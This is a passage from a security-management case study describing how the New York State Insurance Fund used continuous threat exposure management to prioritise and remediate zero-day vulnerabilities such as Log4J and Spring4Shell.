Case Study: Using Continuous Threat Exposure Management to Address Zero-Day Vulnerabilities

Security and risk management leaders can use this study to see how New York State Insurance Fund (NYSIF) utilized a CTEM program to minimize the impact of zero-day vulnerabilities on the organization and ensure they are efficiently and effectively managed.
 
 

Case Overview

Problem
  • Despite efforts to improve, preventative security mechanisms, such as patching, remain challenging. The ever-increasing volumes of threat exposure faced by organizations and the complexity, ownership and availability of remedies limit an organization’s ability to apply basic principles universally. There are too many issues to resolve and a variety of contributing operational factors that influence decision making when deploying patches.
  • The breadth of coverage of the Log4J and Spring4Shell zero-day vulnerabilities in the media heightened awareness of its existence and made it a topic of interest among senior leaders in the business. However, this interest was not related to any risk-based context specific to the company. Actions were taken to resolve issues, but with no analysis of the genuine risk to the business or the likelihood of an impact.
Action
  • The organization scoped the extent of the issue and limited potential impacts by carrying out actions such as routinely restricting user access to resources as part of a standard security hygiene regime. This ensured that only a limited number of user accounts could exploit specific vulnerabilities, such as Log4J.
  • NYSIF maintained a steady state of awareness of existing security weaknesses and ensured timely updates, proper configuration and patches. This provided a solid baseline from which to understand the priority of risks associated with Log4J, thus enabling the organization to effectively schedule work to remediate exposure.
  • By validating the effectiveness of controls and monitoring through continuous intrusion and behavioral monitoring, NYSIF ensured that any illegitimate activity would be logged and alerted upon. This provided clarity on the extent to which a vulnerability exploit had been attempted, which of those attempts had been successful and which had justified the investment in security tooling.
  • NYSIF requested that internal teams, vendors and partners mobilize to validate actions taken in regards to high-impact vulnerabilities. The organization gathered attestations to establish an compliance evidence base for systems over which the security teams have no direct control.
Results
  • A continuous threat exposure management (CTEM) approach enabled NYSIF to identify, address and resolve identified threats, without being compromised. The organization should be able to repeat the same processes to address any potential threats that may arise in the future.
  • Structure and repeatability ensure that future results will be measurable and comparable, and that the security teams will be able to improve the speed of response to significant issues and report successes to the management chain effectively.

Problem

Security teams often find themselves addressing security exposures that have no risk-based context specific to their organization. There is often no effective process in place to remediate the problems that are discovered, and those processes that do exist are often overburdened by a volume of issues that exceeds the level of available resources.
Leadership interest in security issues has increased, and many organizations simply focus on being compliant with frameworks such as ISO27001 or NIST. However, while tackling some of those issues that the industry and the media may consider high priority, security organizations may not be reducing relevant risks or preventing high-impact events. Security teams must adjust industry best practices to suit the needs of their organization.